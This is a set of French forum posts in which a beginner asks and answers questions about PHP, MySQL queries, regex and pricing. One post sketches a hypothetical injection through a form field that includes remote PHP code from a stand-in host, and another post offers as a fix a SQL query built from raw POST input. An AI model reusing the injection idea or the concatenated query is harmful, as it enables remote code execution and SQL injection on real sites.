Bourinho

Merci Caribègue... Avec toi, on a deux réponses pour le prix d'une.... C'est la modification de l'interface qui te pose des soucis??? Plus sérieusement, je pense que le problème de savoir qui a payé est le même pour tous...T'imagines un site qui reçoit des paiements sans savoir de qui cela provient??? Ca serait carrément l'anarchie pour envoyer les colis dans le cas d'un site e-commerce!!!

Salut, Merci pour ton explication mais je pense que je vais me documenter dans ce sens sur le net (ça doit bien exister) car je dois t'avouer que c'est pas évident pour un noob comme moi... Vu que la sécurité est pour moi une chose importante, c'est un passage obligé! Tcho

C'était justement pour ça que je me demandais si c'était légal... Je pense suivre vos conseils finalement en ne proposant qu'un seul prix, celui que je calculerai en fonction de paypal...Tant pis pour le consommateur!!! Ensuite, en voyant la proportion des achats via ce système, je verrai ce que je ferai!!! Encore merci!!! :a_thumbsup_20:

Ok...je viens de capter le concept!!! En fait, le truc qui provoque les insertions de code html à partir d'une chaine de caractère, c'est le echo du php!!! Parce que le code suivant: <?php $Chaine="<?php include("http://Aie.Aie.Aie/PasCool.php") ?>" echo $Chaine ?> va se retrouver en HTML sous la forme suivante <?php include("http://Aie.Aie.Aie.PasCool.php") ?> L'insertion se situe bien au niveau du HTML et non pas au niveau du PHP...d'où l'inexistence de phpentities... Je pense avoir capter le principe... Pour ce qui est du $_SERVER['HTTP_REFERER'], je vais me documenter pour l'éviter car il n'a pas bonne réputation... Encore merci!

En fait, je me disais, si un visiteur malveillant mettait dans la variable $_POST['pseudo'] la valeur suivante : $PagePrecOK)){include(&quot;http://je.te.laisse/imaginer.php");} if((1==1 et bien ça donnerait $PagePrecOK=false; if (isset($_SERVER['HTTP_REFERER']) && isset($PagePrecOK)){include("http://je.te.laisse/imaginer.php");} if((1==1)) { if ($_SERVER['HTTP_REFERER'] == $MonDomaine.'inscription.php') { $PagePrecOK=true; } } c'est à dire $PagePrecOK=false; if (isset($_SERVER['HTTP_REFERER']) && isset($PagePrecOK)) { include("http://je.te.laisse/imaginer.php"); } if((1==1)) { if ($_SERVER['HTTP_REFERER'] == $MonDomaine.'inscription.php') { $PagePrecOK=true; } } Enfin, ça donne un truc pas très sympa qu'on ne peut pas balayer d'un htmlentities (les raisons sont données dans le premier message de ce post)...Je ne sais pas si cela peut fonctionner tel quel parce que la syntaxe est peut être pas bonne (je suis débutant en php...) mais j'ai peur que l'idée puisse être utilisée avec la syntaxe qui va bien... Par avance, merci... PS : Ce n'est pas là pour donner des idées aux gens mal intentionnés mais juste pour illustrer mes propos (ce que je n'avais pas fait dans mon premier message...mais cela nuisait à la clarté de mes propos visiblement...)

Bonjour à tous, je voulais savoir s'il y avait une faille dans le script suivant : $PagePrecOK=false; if ((isset($_SERVER['HTTP_REFERER']))&&(isset($_POST['pseudo']))) { if ($_SERVER['HTTP_REFERER']==$MonDomaine.'inscription.php') { $PagePrecOK=true; } } Je ne m'y connais pas suffisamment pour répondre à ma question (sinon, je ne l'aurais pas posé ici... ) Je me disais avant que faire un isset sur une variable venant d'un formulaire ne devrait pas etre trop méchant... alors je me suis posais la question de l'utilité de mettre un htmlentities ici: isset(htmlentities($_POST['pseudo'])) Vous me direz, "Ouais, mais de toute façon, t'as qu'à le mettre, ça coûte pas grand chose!!!" Je suis d'accord avec vous mais je n'ai pas trop envie de faire faire des opérations inutiles à mon futur serveur!!! (En plus, cela ne fonctionne pas, je vais y revenir...) Pour ma part, je pense qu'il est nécessaire et alors là se pose un second problème: si $_POST['pseudo'] n'existe pas, htmlentities envoit un message d'erreur... En résumé, le soucis, c'est que je voudrais faire un "htmlentities" avant un "isset" mais sans le "isset", je ne peux pas savoir si le "htmlentities" fonctionnera!!! Vous me direz, t'as qu'à faire ta Regex si t'es pas content!!! C'est ce que je vais probablement faire si jamais je ne reçois pas de réponse satisfaisante... Par avance, merci

Ouf TheRec, tu me rassures...je n'ai garanti que la Regex...A partir de là, je ne peux être mis en cause!!!! Blague mis à part, c'est quand même curieux ce qui se passe sur ton serveur!!!

Je te propose ça... RewriteRule ^getperson-([0-9]*[a-zA-Z])-tree-([0-9]+)\.html$ getperson.php?personID=$1&tree=$2 [L] Pour t'expliquer le "bazar"... ([0-9]*[a-zA-Z]) signifie "mets dans $1 ce qui sera entre le parenthèses", ici, il s'agira d'une suite de chiffres (dont la longueur est superieure ou egale a 0) suivi d'une lettre. ([0-9]+) signifie "mets dans $2 ce qui sera entre le parenthèses", ici, il s'agira d'une suite de chiffres (dont la longueur est superieure ou egale à 1) Je pense que c'est ce que tu recherches au niveau de la Regex...mais pour le reste de la syntaxe... je n'ai encore jamais testé l'URL Rewriting

Bonjour, Je souhaitais savoir s'il était légal d'afficher différents prix selon le moyen de paiement choisi par le client. En effet, Paypal, prend 4% sur chaque transaction et une banque environ 2% (ces chiffres sont juste là pour être un peu plus dans le concret). On voit assez aisément que Paypal me prendrait une part de mon CA plus importante que la solution bancaire. Cependant, ces solutions sont complémentaires et permettent de toucher un plus vaste public. J'aimerais donc bien proposer ces deux solutions mais avec des prix différents...Ai-je le droit??? Par avance, merci.

Salut AllForEver, Je sais pas si c'est mon EasyPHP qui déconne mais la requête suivante : $reponse=mysql_query('SELECT IdMembre FROM membres WHERE Pseudo = '.$Pseudo); ne fonctionne pas tip top car elle renvoit toujours faux... Enfin, j'ai expliqué le problème quelques (4) messages plus haut...

Ca me fait plaisir...T'es la première personne que j'aide sur ce forum!!! Après plus d'une quarantaine de question, je fourni enfin une réponse!!!Quel soulagement... Sinon, vu que la sécurité a l'air d'être une de tes principales angoisses (moi, j'ai la même...). Je pense qu'avec ce code, y a pas trop moyen de te balancer un truc dangereux...(parce que sans < > = " et ' je sais pas comment c'est possible!!!) Un lien pour "dominer" les Regex : LeSiteDuZero

Je suis pas un pro des Regex, mais je pense que ça ne fonctionne pas parce que telle que tu l'as écrite, il faut que $nom soit composé d'une suite comme suit : un élément de [0-9a-zA-Z] suivi de l'élément de type string suivant " ._.-" et cela autant de fois que nécessaire... Je pense que tu devrais essayer : ereg("^[0-9a-zA-Z _.-]*$",$nom) C'est sans garantie mais ça coute rien d'essayer...

Je suis d'accord avec toi que le gain est minime...mais bon, ça coûte vraiment pas grand chose...surtout que ça marche cette fois!!! Et puis, étant un noob, je préfère prendre de bonnes habitudes d'écriture dans la mesure du possible... En plus de ça, un gain minime multiplié par 30.000visiteurs/jour, ça peut soulager le serveur... . Si un jour ça arrive, tu en seras le premier prévenu!!! Mais je te rassure, tu peux dormir sur tes deux oreilles pendant un bon bout de temps!!!

En fait, la première solution proposée ne résout pas tout...Je n'ai plus le WARNING mais ça ne fait pas ce que je souhaite car $reponse est toujours false ...la solution du rajout du 'if' est à conserver mais la requête est à modifier...je la rappelle: $reponse=mysql_query('SELECT IdMembre FROM membres WHERE Pseudo = '.$Pseudo); En effet, il faut: $reponse=mysql_query('SELECT IdMembre FROM membres WHERE Pseudo=\''.$Pseudo.'\''); Je pense que c'est du au fait que dans la première requête, $Pseudo n'est pas entouré de quotes et ça doit pas correspondre au format souhaité dans une requête SQL. En tout cas, la seconde fonctionne et elle n'utilise pas de double-quotes qui ralentissent le processus d'après ce qui se dit sur le net (et sur ce forum...) C'était un complément au passage... et puis ça me permet de fournir ma première "réponse" dans ce forum ou pour l'instant je ne fais que poser des questions...

Mais ça affiche le WARNING dans tous les cas ??? Parce que j'ai essayé dans les deux ordres et à chaque fois j'ai eu le WARNING!!! J'ai remarqué que toi tu mettais '&&' et non pas '&' entre tes conditions...ça change quelquechose???

Pardon, ce post est sans doute inutile... J'ai trouvé la solution à mon problème, mais bon, ça soulève une question tout de même : "Y a t'il un ordre dans les conditions???

Bonjour à tous, je me pose une question non pas pour résoudre un problème mais pour rendre un code plus agréable à la lecture. Voilà l'objet de la question : if (isset($_SERVER['HTTP_REFERER'])) { if ($_SERVER['HTTP_REFERER']==$MonDomaine.'inscription.php') { echo "Mon site va tout déchirer"; } else { echo "Mais quelle page t'a amené ici???"; } } else { echo "Mais quelle page t'a amené ici???"; } Bon, c'est pour l'exemple mais cela met bien le doigt sur ce qui m'embête. Vous voyez que sur ce code, pour dire : "Si $_SERVER['HTTP_REFERER'] est différent $MonDomaine.'inscription.php' affiche "Mais quelle page t'a amené ici???" ". je suis obligé de 'recopier' " echo "Mais quelle page t'a amené ici???" " deux fois, ce qui n'est pas très agréable à lire. Je sais que je pourrais faire un include mais je trouve ça plutôt dommage. Donc je me suis dit, il y a peut-être un ordre dans les conditions dans le but de faire un seul if. En effet, pour une condition qui contient un '&', si l'une des deux sous-conditions n'est pas vérifiée, il n'est pas nécessaire de se pencher sur la seconde. Enfin, le 'if' en question ressemblerait à celui ci: if (($_SERVER['HTTP_REFERER']==$MonDomaine.'inscription.php')&(isset($_SERVER['HTTP_REFERER']))) J'ai essayé dans les deux sens et j'ai toujours le WARNING qui s'affiche sur la page en question. Alors si jamais quelqu'un a une solution pour éviter un include ou un copier/coller, je suis preneur. Par avance, merci...

Ludo, ta réponse était nickel mais je souhaitais juste un complément d'information pour ne pas rester ignard toute ma vie sans comprendre ce que je fais... ce qui ressemblerait un peu à du suicide sur le web. Car qui dit applique sans rien capter, dit possibilité de laisser des failles. Attention, je ne dis pas que ta solution aurait pu être dangereuse (car j'ai confiance en les utilisateurs de ce forum) mais la compréhension me semble nécessaire pour la programmation (oh punaise, ça rime!!!) Et comme disait un des profs de maths que j'ai du endurer : "Sciences sans conscience n'est que ruine de l'âme"...Je vous laisse méditer

4min pour une réponse qui fonctionne... C'est quand même mieux que les 13 minutes de la dernière fois!!! Que dire à part : MERCI LE HUB!!! et bien sur, merci ludo88!! PS : Pour comprendre quand même ce qui se passe...le if($reponse)...c'est pas un peu comme un isset pour le resultat d'une requete???

Bonjour à tous, Dans ma quête d'informations pour créer mon site web, il y a une étape où je ne trouve pas mon bonheur... Voilà, maintenant, j'arrive a me connecter à ma base de donnée J'arrive même à faire des requêtes SQL Le truc, c'est que j'arrive pas trop à exploiter le résultat de cette requête Voilà ce que j'ai codé : (vous allez tout de suite comprendre que je m'adresse aux pros du SQL qui en font au moins depuis....une semaine ) $Pseudo=$_POST['pseudo']; $reponse=mysql_query('SELECT IdMembre FROM membres WHERE Pseudo = '.$Pseudo); while ($donnees = mysql_fetch_array($reponse)) { ce que je veux faire...faut pas être trop curieux!!!! } Ce qui m'embête, c'est que lorsque le résultat de la requête est vide (là, je pense que j'utilise pas forcément le terme adéquat pour les puristes...), EasyPHP me renvoit la phrase suivante : Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in c:\program files\easyphp1-8\www\monsite\inscription.php on line 19 Admettez que c'est pas forcément le truc le plus joli qu'on peut trouver pour décorer un site web J'espère avoir été clair... Par avance, merci!

FireFox permettrait de faire fonctionner Internet Explorer... Faut avouer que c'est plutôt drôle... Blagues mises à part, je te conseille d'utiliser Firefox parce qu'il gère mieux les fichiers CSS...ça permet d'accéder à des sites avec plus d'effets... enfin, ca peut être un petit peu plus joli... Et comme dis Ghost : A+

Tiens, voilà un lien qui te permettra de bien négocier les REGEX:http://www.siteduzero.com/tuto-3-168-1-les....html#ss_part_1 Franchement, il est trop bien fait ce site...

Merci à tous, j'essaierai ça ce soir...(bah oui, je suis en Nouvelle Zélande... ) 13 min pour une réponse complète, le hub n'était pas très en forme cette fois ci...y a pas une garantie "Réponse en moins de dix minutes ou remboursé" sur ce forum??? Encore merci!

Salut, je suis l'auteur de ce post et j'avance pas a pas... et je pense que pas mal de webmasters en herbe (pour ne pas dire en mousse... ) comme moi doivent suivre a peu près le même chemin que moi... J'ai utilsé la méthode citée plus haut: Alors, y a des trucs que je pige pas... 1)Pourquoi mettre des @ devant mysql_connect et mysql_select_db? 2)Pourquoi mettre le resultat de ces fonctions dans des variables globales? 3)Quelles sont les valeurs attendues de $GLOBALS["db_connexion"] et $GLOBALS["db"] ??? Pour moi, ça donne "Resource id #2" et "1", c'est bon signe??? 4)Et enfin, quand je mets : il me renvoit : alors que sur le net, j'ai vu plein d'exemples ou c'est censé marcher... Par avance, merci

J'ai essayé et ça marche pas... Je vais le réinstaller je viens de retrouver une sauvegarde de ma base de données... Je pense que je ne referais pas la même erreur plus tard...et je vois qu'il me reste pas mal de truc à connaitre dans le domaine!!!! Merci et à une prochaine (bourde... )